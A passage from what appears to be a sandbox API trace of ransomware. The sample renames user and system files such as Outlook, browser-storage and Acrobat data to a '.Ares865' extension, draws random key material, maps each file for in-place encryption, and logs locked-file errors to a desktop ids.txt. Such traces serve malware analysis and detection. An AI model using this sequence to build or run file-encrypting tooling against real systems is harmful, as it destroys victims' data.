HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.xml.Ares865") returned 84 [0052.074] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\outlook\\outlook.xml.ares865"), dwFlags=0x1) returned 1 [0052.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\outlook\\outlook.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0052.074] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2466) returned 1 [0052.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3430020 [0052.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0052.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0408 [0052.075] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0490) returned 1 [0052.076] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0052.076] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0052.076] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcb0, lpName=0x0) returned 0x168 [0052.078] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcb0) returned 0x190000 [0052.079] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0490) returned 1 [0052.079] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0052.079] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0052.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0052.448] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.Ares865") returned 115 [0052.448] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.ares865"), dwFlags=0x1) returned 1 [0052.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0052.449] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=836) returned 1 [0052.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3430020 [0052.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f80 [0052.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0052.449] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0052.450] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0052.450] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0052.450] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x168 [0052.459] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x190000 [0052.460] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0052.461] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0052.461] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0052.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0052.469] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.Ares865") returned 118 [0052.469] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.ares865"), dwFlags=0x1) returned 1 [0052.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0052.471] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=13) returned 1 [0052.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3430020 [0052.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f80 [0052.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0052.472] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0052.472] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0052.472] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0052.473] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x168 [0052.475] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0052.476] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0052.477] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0052.477] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0052.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0052.481] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.Ares865") returned 124 [0052.481] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.ares865"), dwFlags=0x1) returned 1 [0052.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0052.481] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=13) returned 1 [0052.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3430020 [0052.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f80 [0052.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0052.482] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0052.482] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0052.482] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0052.482] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x168 [0052.484] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0052.485] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0052.486] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0052.486] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0052.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0052.601] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.Ares865") returned 88 [0052.601] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.ares865"), dwFlags=0x1) returned 1 [0052.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0052.602] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=42495) returned 1 [0052.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3430020 [0052.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0052.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0052.602] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0052.603] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0052.603] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0052.603] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa900, lpName=0x0) returned 0x168 [0052.605] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa900) returned 0x190000 [0052.609] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0052.609] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0052.609] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0052.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0053.547] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.547] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\SPP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x764bb2c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x516b2240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x516b2240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf28 [0053.606] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 62 [0053.606] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.606] GetLastError () returned 0x20 [0053.606] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 84 [0053.606] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 84 [0053.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.607] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1c78 [0053.607] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x54, lpOverlapped=0x0) returned 1 [0053.607] CloseHandle (hObject=0x12c) returned 1 [0053.609] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.609] CloseHandle (hObject=0x0) returned 0 [0053.609] CloseHandle (hObject=0x0) returned 0 [0053.609] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.609] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 69 [0053.609] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.609] GetLastError () returned 0x20 [0053.609] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 91 [0053.609] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 91 [0053.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.610] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1ccc [0053.610] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x5b, lpOverlapped=0x0) returned 1 [0053.610] CloseHandle (hObject=0x12c) returned 1 [0053.610] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.610] CloseHandle (hObject=0x0) returned 0 [0053.610] CloseHandle (hObject=0x0) returned 0 [0053.610] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.611] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0053.611] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0053.639] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 79 [0053.639] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.640] GetLastError () returned 0x20 [0053.640] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 101 [0053.640] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 101 [0053.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.640] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d27 [0053.640] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x65, lpOverlapped=0x0) returned 1 [0053.640] CloseHandle (hObject=0x12c) returned 1 [0053.641] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.641] CloseHandle (hObject=0x0) returned 0 [0053.641] CloseHandle (hObject=0x0) returned 0 [0053.641] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.641] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 86 [0053.641] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.641] GetLastError () returned 0x20 [0053.641] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 108 [0053.641] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 108 [0053.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.642] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d8c [0053.642] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x6c, lpOverlapped=0x0) returned 1 [0053.642] CloseHandle (hObject=0x12c) returned 1 [0053.643] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.643] CloseHandle (hObject=0x0) returned 0 [0053.643] CloseHandle (hObject=0x0) returned 0 [0053.643] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.643] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0053.643] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0053.669] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application 